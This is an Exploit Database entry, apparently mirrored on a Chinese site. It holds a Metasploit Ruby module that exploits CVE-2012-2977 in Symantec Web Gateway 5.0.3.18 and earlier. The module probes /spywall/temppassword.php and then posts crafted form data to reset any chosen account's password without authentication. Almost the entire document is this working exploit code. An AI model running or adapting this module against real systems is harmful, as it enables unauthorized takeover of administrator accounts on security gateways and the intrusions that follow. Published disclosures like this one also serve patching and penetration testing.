Symantec Web Gateway 5.0.3.18 – Arbitrary Password Change (Metasploit)

• Exploit Database
• 33 阅读

• 作者： Kc57
  日期： 2012-08-21
• 类别：

  • webapps
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/20706/

• ##
  # @_Kc57
  # Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Auxiliary
  
  	include Msf::Exploit::Remote::HttpClient
  
  	def initialize(info={})
  		super(update_info(info,
  			'Name' => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",
  			'Description'=> %q{
  					This module will change the password for the specified account on a Symantec Web Gatewaye server.
  			},
  			'License'=> MSF_LICENSE,
  			'Version'=> "$Revision: 0 $",
  			'Author' =>
  				[
  					'Kc57',
  				],
  			'References' =>
  				[
  					[ 'CVE', '2012-2977' ],
  					[ 'OSVDB', '0' ],
  					[ 'BID', '54430' ],
  					[ 'URL', 'https://www.securityfocus.com/bid/54430' ],
  				],
  			'DisclosureDate' => "Jul 23 2012" ))
  
  			register_options(
  				[
  					Opt::RPORT(80),
  					OptString.new('USER', [ true, 'The password to reset to', 'admin']),
  					OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
  				], self.class)
  	end
  
  	def run
  
  		print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password")
  		res = send_request_raw(
  		{
  			'method'=> 'POST',
  			'uri' => '/spywall/temppassword.php',
  		}, 25)
  
  		#check to see if we get HTTP OK
  		if (res.code == 200)
  			print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable")
  		else
  			print_error("Did not get HTTP 200, URL was not found. Exiting!")
  			return
  		end
  
  		#Check to if the temppassword.php page loads or if we are redirected to the login page
  		if (res.body.match(/Please Select a New Password/i))
  			print_status("Server is vulnerable!")
  		else
  			print_error("Target doesn't seem to be vulnerable!")
  			return
  		end
  
  		print_status("Attempting to exploit password change vulnerability on #{rhost}")
  		print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}")
  
  		data= 'target=executive_summary.php'
  		data << '&USERNAME=' + datastore['USER']
  		data << '&password=' + datastore['PASSWORD']
  		data << '&password2=' + datastore['PASSWORD']
  		data << '&Save=Save'
  
  		res = send_request_cgi(
  		{
  			'method'=> 'POST',
  			'uri' => '/spywall/temppassword.php',
  			'data'=> data,
  		}, 25)
  
  		if res.code == 200
  			if (res.body.match(/Thank you/i))
  				print_status("Password reset was successful!\n")
  			else
  				print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n")
  			end
  		else
  			print_error("Password reset failed!")
  		end
  	end
  
  end